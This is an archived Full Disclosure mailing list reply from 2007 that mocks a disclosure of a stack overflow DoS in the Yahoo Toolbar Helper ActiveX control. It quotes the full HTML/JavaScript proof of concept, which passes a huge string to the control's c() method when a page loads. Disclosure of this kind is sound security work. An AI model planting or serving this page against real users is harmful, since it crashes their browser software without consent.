Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Yahoo Toolbar Helper c() Method Stack Overflow DoS
From: "Joey Mengele" <joey.mengele () hushmail com>
Date: Fri, 30 Nov 2007 10:59:37 -0500

Yeah, strange how EIP isn't overwritten with your hacker savvy 0x41 
characters. Except for the fact that this again is a stack overflow 
exception and not a stack based buffer overflow. I implore you, 
LEAVE THE TROLLING TO THE PROFESSIONALS. Thanks.

J

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad 
<elazarb () earthlink net> wrote:
There is a stack overflow in the c() method of the Yahoo Toobar 
Helper class. This overflow does not appear to get anywhere near 
the EIP or SEH. PoC as follows:

----------------------
<!--
written by e.b.
-->
<html>
<head>
 <script language="JavaScript" DEFER>
   function Check() {
   var s = "AAAA";

    while (s.length < 999999) s=s+s;

    var obj = new ActiveXObject("yt.ythelper.2"); //{02478D38-
C3F9-4EFB-9B51-7695ECA05670}
     obj.c(s);
  }
 </script>

</head>
<body onload="JavaScript: return Check();">
</body>
</html>
----------------------

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

--
Click here for to find products that will help grow your small business.
http://tagline.hushmail.com/fc/Ioyw6h4eDJdaRPJuJyztiEAJ83hvsi2qyqoJMOdLAcA5KZpqWleU5a/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Re: Yahoo Toolbar Helper c() Method Stack Overflow DoS Joey Mengele (Nov 30)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]